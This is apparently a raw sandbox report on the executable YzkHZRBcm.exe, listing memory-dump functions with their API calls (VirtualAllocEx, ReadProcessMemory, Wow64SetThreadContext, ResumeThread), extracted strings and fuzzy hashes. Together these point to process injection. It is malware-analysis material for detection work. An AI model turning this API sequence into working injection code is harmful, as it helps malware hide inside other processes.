Instruction Fuzzy Hash: 1A21E3B5D00258EFDB10CF9AD884ADEBBF4EB48310F14841AE958A7350D378A944CFA5

Function 071B53D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071B5456

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8e8bfd59cdb815c09d77d3b251713b08f1b367bc0ad77cefcd81c865249e369a
Instruction ID: 49e03e9f154122a13ea788121272d6ea758f637bf981aa7b7e09714e05bc8673
Opcode Fuzzy Hash: 8e8bfd59cdb815c09d77d3b251713b08f1b367bc0ad77cefcd81c865249e369a
Instruction Fuzzy Hash: 602168B1D003098FDB20CFAAC4807EEBBF4EF48210F64842ED519A7240DB789945CFA4

Function 071B5A98 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071B5B18

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6dcaf12ba6041be42a8f42b2a326eb0e0032a1b3a73b360598c2b2b80b37c831
Instruction ID: a1bd7c5b1b548747b4232e1cbae1921b9c753b8d74c80cae1c66ee180122d2df
Opcode Fuzzy Hash: 6dcaf12ba6041be42a8f42b2a326eb0e0032a1b3a73b360598c2b2b80b37c831
Instruction Fuzzy Hash: 522116B1C003499FDB14CFAAC940BEEBBF5FF48310F50842AE919A7240C7799501CBA5

Function 0102D629 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D5F6,?,?,?,?,?), ref: 0102D6B7

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 12fce50eb386d93b9f1a533c30e869a4327d987461472b8500acaf38f019c290
Instruction ID: 3a43fd4ec2a94d211034ea82049b40c1344e30dcd6aa5432b5f6ac4e557f08fd
Opcode Fuzzy Hash: 12fce50eb386d93b9f1a533c30e869a4327d987461472b8500acaf38f019c290
Instruction Fuzzy Hash: B52112B5D00249DFDB10CFAAD984ADEBBF4EB48310F14841AE958B3310C378AA40CFA0

Function 071B58E0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071B5956

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a89c8c37cfdf0d22b83238acaba173547c158902a155e5dd162799d77b5bbee7
Instruction ID: fc0a9f8a7c4e846a4d42b47a084f5236dd16650305d6b8789f356db4daedb6bf
Opcode Fuzzy Hash: a89c8c37cfdf0d22b83238acaba173547c158902a155e5dd162799d77b5bbee7
Instruction Fuzzy Hash: 901167B18003499FDB20CFAAC841BDEBFF5EB48320F24841AE559A7250CB75A514CBA0

Function 071B58E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071B5956

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6a086771e5e902cf6370fa19dd0775a3a0244ff05f50dc89d987da172d52615c
Instruction ID: c0e7103ea3d981582ea6dbac5f1ca1f855cf29e5402555145b431e4eb39658f5
Opcode Fuzzy Hash: 6a086771e5e902cf6370fa19dd0775a3a0244ff05f50dc89d987da172d52615c
Instruction Fuzzy Hash: 91112672C003499FDB24DFAAC844BDEBBF5EB48320F24841AE559A7250CB759550CBA5

Function 071B5320 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 071B538A

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7da79ee982c7096b6292f827a8a3c989909a80a4be83c4ce2b6028d68c1c8270
Instruction ID: 892a6c74af9f57dcedfea70b8f37f951997fec380164b8b0dadb87b93dfff8f9
Opcode Fuzzy Hash: 7da79ee982c7096b6292f827a8a3c989909a80a4be83c4ce2b6028d68c1c8270
Instruction Fuzzy Hash: 1C1146B5D003498FDB24DFAAC4447EEFBF5EB88220F24841AD559A7350CB79A904CBA5

Function 071B9300 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071B9365

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b817eb5b9a83984d8c5423db6795b9842a0a8d4698dc9c801f11784364688eef
Instruction ID: c8258e3d396381dc363d8c6fadbc7010785483f202cd2a7b4dc53aef09e10c17
Opcode Fuzzy Hash: b817eb5b9a83984d8c5423db6795b9842a0a8d4698dc9c801f11784364688eef
Instruction Fuzzy Hash: 4A1125BA800349DFDB20CF9AC845BDEFBF8EB48720F10840AE558A7251C375A544CFA1

Function 071B5328 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 071B538A

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 730a2c1837b8fc886aad0cdac4fd62fd5315c56461969eaeb3362dd7710495e1
Instruction ID: 45d33bf9184ab7e882f1a550fcaf446baf2109affbf399e2d0a906b5bcf9c9f7
Opcode Fuzzy Hash: 730a2c1837b8fc886aad0cdac4fd62fd5315c56461969eaeb3362dd7710495e1
Instruction Fuzzy Hash: E41125B1D003498FDB24DFAAC4447EEFBF5EB88320F24841AD519A7350CB79A944CBA5

Function 071B6B08 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071B9365

Memory Dump Source

Source File: 0000000A.00000002.1425251965.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71b0000_YzkHZRBcm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c1025062b9e88302c55cb6c1e0a2781d85e11fa3670b2a6837664bcd72a0507c
Instruction ID: 00b22d74a763d23d242d66e8e96248334feb063f04aa0e7edcd8aa763c3e18d5
Opcode Fuzzy Hash: c1025062b9e88302c55cb6c1e0a2781d85e11fa3670b2a6837664bcd72a0507c
Instruction Fuzzy Hash: 9011F2B5804349DFDB20CF9AC984BDEFBF8EB48310F10841AE959A7250C379A944CFA1

Function 0102AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0102AF9E

Memory Dump Source

Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 68e0837aaa0f115dc2a7f68febd49b3bc28d75a6d9ee767ca31101d165eb562a
Instruction ID: 43f629dab24b3f2591d285c74b1c73cfbf0d1249bcb2edfba3b9fe3aa5741fab
Opcode Fuzzy Hash: 68e0837aaa0f115dc2a7f68febd49b3bc28d75a6d9ee767ca31101d165eb562a
Instruction Fuzzy Hash: 651110B6D00249CFDB20CF9AC444BDEFBF4EB88214F10841AD959A7650C379A545CFA1

Function 00E2D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6136717513a71a05d4c240bfddd893fac0b2c6696fa6efebff0ec8990f49c86a
Instruction ID: 188147b218fa094c4641b9d05447773e729b15e160427c484af7bf67672d9432
Opcode Fuzzy Hash: 6136717513a71a05d4c240bfddd893fac0b2c6696fa6efebff0ec8990f49c86a
Instruction Fuzzy Hash: E1214572548240EFDB15DF14EDC0B26BF61FB88318F30C569EA091F256C376D856CAA2

Function 00E2D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29630e117d7d074c0c6374cb75940647169cbccdaaaae5dbbba276bcd9b9e96
Instruction ID: fb43956aefa8753a5515b5a59b72facbd58098d1f701d47078f7da6b8fe5cbd1
Opcode Fuzzy Hash: a29630e117d7d074c0c6374cb75940647169cbccdaaaae5dbbba276bcd9b9e96
Instruction Fuzzy Hash: 19212872508304DFDB14EF14EDC0B16BB65FB94328F20C56DEA0A5F256C336E856CAA2

Function 00E3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418529936.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92637daf7e5a3b845f48dd3535d93ecb01441a9f4d7b80f5994422382fa03ce
Instruction ID: ebb10d7958a3f340c59e0d3629f4e33d9d0086fb01fc4bb49b01bbf9ef6b65b4
Opcode Fuzzy Hash: a92637daf7e5a3b845f48dd3535d93ecb01441a9f4d7b80f5994422382fa03ce
Instruction Fuzzy Hash: 7F210771508304EFDB15DF64E9C8B26BF65FB84318F20C56DE8095F2A2C336D856CA61

Function 00E3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418529936.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548705eeb922fd8353d51384f6116da7c04f5db036b23c1b1ffd3d830e9955b6
Instruction ID: 89d9815d8ac67a64733676dea24b656a881729fd04619527772a568f64378910
Opcode Fuzzy Hash: 548705eeb922fd8353d51384f6116da7c04f5db036b23c1b1ffd3d830e9955b6
Instruction Fuzzy Hash: E821C171508200DFDB18DF24E988B16BF66EB84718F20C569E84A5B296C336D847CE62

Function 00E3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418529936.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18d2ae560d1378321e984e24e662b9638ee359e8c70e6b0bfd718272e89f2c1
Instruction ID: 544e27bf363180d72e954e96f35f41b257619ad42ac90310ff2059db75caa318
Opcode Fuzzy Hash: f18d2ae560d1378321e984e24e662b9638ee359e8c70e6b0bfd718272e89f2c1
Instruction Fuzzy Hash: 6C21807550D3809FCB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62

Function 00E2D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 4083b2c769e272d6905f70c9ca288d412e900212378d654a307cc33c943b6cfd
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 09110372408280DFCB15CF10E9C0B16BF71FB84328F24C6A9D9094B656C336D856CBA2

Function 00E2D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 84544f32896890dc185c18f28a40ad076aedb9587674e0b843b2ed228f065b13
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 131103B2408280DFDB15DF00E9C0B16BF71FB94324F24C6A9D9094F656C33AE856CBA2

Function 00E3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418529936.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: ea6db55043de8771c3987afb1a123d501a032d3ccb631cd167c45e87a14b02a0
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 47118E75508240DFDB15CF50D9C4B16FF61FB84318F24C6A9D8494B6A6C33AD85ACB51

Function 00E2D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95c5397381e4250ed9a3425628a171932cfa771124e8ac145f66058809e49ed
Instruction ID: 22a9b6cc804c0d41399291bd790c58136d6811f495775fa7feb6828d3f386899
Opcode Fuzzy Hash: c95c5397381e4250ed9a3425628a171932cfa771124e8ac145f66058809e49ed
Instruction Fuzzy Hash: F901A231408354EAF7204B25EC84BA6FBD8EF41764F18955BEE096E286C27D9840CAB2

Function 00E2D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1418456249.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268705051db0521726d876c031d8c2ec7127857fbe931341f7f6f8ef0fc3f71c
Instruction ID: 360fef0191544e4986ff09effe14d5d697706885b893b8390273df6ada0505d4
Opcode Fuzzy Hash: 268705051db0521726d876c031d8c2ec7127857fbe931341f7f6f8ef0fc3f71c
Instruction Fuzzy Hash: 5AF06271408354EEE7208A16DD84B62FFE8EF51724F18C55BEE495F286C2799844CAB1

Analysis Process: YzkHZRBcm.exePID: 6504, Parent PID: 8040COMMON

Executed Functions

Function 012BC146 Relevance: 6.5, Strings: 5, Instructions: 229COMMON

Download Yara Rule

Strings

LjMp, xrefs: 012BC38D
PHq, xrefs: 012BC400
PHq, xrefs: 012BC3EF
0oMp, xrefs: 012BC20A
LjMp, xrefs: 012BC377

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: bfc7a4f0f9604c28840309bace509ed3faae497c242665690dd0eb444141b649
Instruction ID: 81e81fe302c257747d4055d15860911ec7876b5eb72e9e4d745b43a625ca6b9d
Opcode Fuzzy Hash: bfc7a4f0f9604c28840309bace509ed3faae497c242665690dd0eb444141b649
Instruction Fuzzy Hash: 09A1F774E10218DFDB14CFAAD884A9DBBF2FF89350F14806AE509AB365DB749941CF50

Function 012BC468 Relevance: 6.4, Strings: 5, Instructions: 199COMMON

Download Yara Rule

Strings

PHq, xrefs: 012BC6BF
LjMp, xrefs: 012BC65D
PHq, xrefs: 012BC6D0
0oMp, xrefs: 012BC4DA
LjMp, xrefs: 012BC647

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: df67d9ea38fc952bbdd8d8f3a132a5c8db2a4ada816c93a720b7a82c7961143c
Instruction ID: 6312fbf76d1642a730884960efe101a7d175cbeee42b1b60e24ea7313deb0194
Opcode Fuzzy Hash: df67d9ea38fc952bbdd8d8f3a132a5c8db2a4ada816c93a720b7a82c7961143c
Instruction Fuzzy Hash: 4991C274E10209CFEB14DFAAD984ADDBBF2BF88300F148069E519AB355DB74A941CF50

Function 012B5362 Relevance: 6.4, Strings: 5, Instructions: 198COMMON

Download Yara Rule

Strings

LjMp, xrefs: 012B5566
PHq, xrefs: 012B55C8
0oMp, xrefs: 012B53E2
LjMp, xrefs: 012B5550
PHq, xrefs: 012B55D9

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 9df3bbc25a48dcc9ace81a85245c0a8972f650880f07c57c3670c0bb61d2def2
Instruction ID: c4e107fd19fc18d1101cbc3d6f1424fed80704a0849bf6368659c264585e9bc9
Opcode Fuzzy Hash: 9df3bbc25a48dcc9ace81a85245c0a8972f650880f07c57c3670c0bb61d2def2
Instruction Fuzzy Hash: 5B91C274E10218CFEB14CFA9D884ADDBBF2BF89310F148069E919AB365DB749985CF50

Function 012BCA08 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

LjMp, xrefs: 012BCBE7
0oMp, xrefs: 012BCA7A
LjMp, xrefs: 012BCBFD
PHq, xrefs: 012BCC5F
PHq, xrefs: 012BCC70

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 1c665fd0ac0a797b5d262ae169b59ec9086efc7a5ec567a6a1896e3f48b8afd5
Instruction ID: 4151e21200ef9634eadaa1d597058b28f9482bf3c3311aee19a8fc30a4297c8f
Opcode Fuzzy Hash: 1c665fd0ac0a797b5d262ae169b59ec9086efc7a5ec567a6a1896e3f48b8afd5
Instruction Fuzzy Hash: 8591D574E10218CFEB14DFAAD884A9DBBF2BF89310F148069E519AB365DB345981CF50

Function 012BD278 Relevance: 6.4, Strings: 5, Instructions: 192COMMON

Download Yara Rule

Strings

LjMp, xrefs: 012BD457
PHq, xrefs: 012BD4E0
PHq, xrefs: 012BD4CF
LjMp, xrefs: 012BD46D
0oMp, xrefs: 012BD2EA

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 767c79e3fc7fb235afc45575e1ca4f426598f16a61628e009d9c69917f88052a
Instruction ID: 7bacb9a57c33ee82e1d76b30375c7a704e601909977bb5a8b1c57a04241cbb22
Opcode Fuzzy Hash: 767c79e3fc7fb235afc45575e1ca4f426598f16a61628e009d9c69917f88052a
Instruction Fuzzy Hash: 2981C374E10208CFDB14DFAAD884ADDBBB2BF88354F148069E519AB365DB349881CF50

Function 012BCCD8 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHq, xrefs: 012BCF2F
0oMp, xrefs: 012BCD4A
LjMp, xrefs: 012BCEB7
PHq, xrefs: 012BCF40
LjMp, xrefs: 012BCECD

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 4e9520fda3d9044f7caafb65ee1c62465824edb5db36309cda7a0ca3070593f3
Instruction ID: af16b41d709f67fc811c0adb056eb99852d238cd7453c11e2c23eadaff78f17b
Opcode Fuzzy Hash: 4e9520fda3d9044f7caafb65ee1c62465824edb5db36309cda7a0ca3070593f3
Instruction Fuzzy Hash: A981D374E10209DFEB14DFAAD884A9DBBF2BF89310F14C069E919AB365DB345981CF50

Function 012BC738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjMp, xrefs: 012BC917
PHq, xrefs: 012BC98F
PHq, xrefs: 012BC9A0
LjMp, xrefs: 012BC92D
0oMp, xrefs: 012BC7AA

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 528ca54dfb58606a3138b62a3e60884178ea8a570e897ea4fde42184ed6db363
Instruction ID: 5a07a8870adee2479d543feb037b677a06d6ecdeac01ceb78b9e7342adefded7
Opcode Fuzzy Hash: 528ca54dfb58606a3138b62a3e60884178ea8a570e897ea4fde42184ed6db363
Instruction Fuzzy Hash: 3281D474E10218CFEB14DFAAD984A9DBBF2BF88310F14C069E819AB365DB349841CF50

Function 012BCFA9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

0oMp, xrefs: 012BD01A
PHq, xrefs: 012BD210
LjMp, xrefs: 012BD19D
PHq, xrefs: 012BD1FF
LjMp, xrefs: 012BD187

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 9dcbd3438465a1ddca7d47051cf0ef7b445ddeae2ba1d170d550860bf2dbff19
Instruction ID: 97ce73a097b01904afac19df0b1a4defb63af9f5295e68cfd3ca968eeb238061
Opcode Fuzzy Hash: 9dcbd3438465a1ddca7d47051cf0ef7b445ddeae2ba1d170d550860bf2dbff19
Instruction Fuzzy Hash: A781C374E10218CFEB14DFAAD984ADDBBF2BF88314F148069E519AB365DB349981CF50

Function 012B6FC8 Relevance: 4.3, Strings: 3, Instructions: 530COMMON

Download Yara Rule

Strings

(oq, xrefs: 012B7212
(oq, xrefs: 012B753D
(oq, xrefs: 012B7220

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: 2cf01ad8af8097cbba6e8c89943a29e9b2a295493b8a6ef2ba855e0a26699f96
Instruction ID: 44efb48e44274433b0da362f5eed28f382615cfb58207d2b87547109b234eddb
Opcode Fuzzy Hash: 2cf01ad8af8097cbba6e8c89943a29e9b2a295493b8a6ef2ba855e0a26699f96
Instruction Fuzzy Hash: AD225D30A20249CFDB15CF68D884AEDBBB6FF88350F19846AE915EB2A1D734DD41CB50

Function 012BA088 Relevance: 3.4, Strings: 2, Instructions: 902COMMON

Download Yara Rule

Strings

(oq, xrefs: 012BA518
4'q, xrefs: 012BAB13

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: (oq$4'q
API String ID: 0-1336004174
Opcode ID: 8877065db197a63c3350e1565b1f626cda650051537e4d34ca06c6add1523a08
Instruction ID: 24e46af64b81505635d9f26202e3f5042218cf52138b39bcbdd6de734121f454
Opcode Fuzzy Hash: 8877065db197a63c3350e1565b1f626cda650051537e4d34ca06c6add1523a08
Instruction Fuzzy Hash: E8829D31A1020ADFCB15CFA8C5C4AEEBBF2FF88350F158569E5159B266D730E985CB60

Function 012B69A0 Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

(oq, xrefs: 012B6EDA

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 0a11dd408d7a08346443af2eb398bf61f6324e663523716b30e7d5824c35627b
Instruction ID: 09a2e92bf5c4fc499b78c83f1926134ee59ac0b152598818e5b8d2ae6260f7d4
Opcode Fuzzy Hash: 0a11dd408d7a08346443af2eb398bf61f6324e663523716b30e7d5824c35627b
Instruction Fuzzy Hash: E712A070A1020A8FDB15DFA9C884BAEBBF6FF88350F148529E515DB395DB349D85CB80

Function 012B29EC Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12b0000_YzkHZRBcm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76aac3964db9b6d0f711d8904b567a0174b806c91c12ec6cfa0aadb1f55ddec3
Instruction ID: f1eb2471a5898f869ab42744a2a3a606b423ea224e558538f437a0d36c2ce0f1
Opcode Fuzzy Hash: 76aac3964db9b6d0f711d8904b567a0174b806c91c12ec6cfa0aadb1f55ddec3
Instruction Fuzzy Hash: 6C02CC32914796CFCB62CF78C5D9A96BFB0FF4A314B144A9DC4459B51ADB31A900CF82

Function 012B3AA1 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3801070779.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

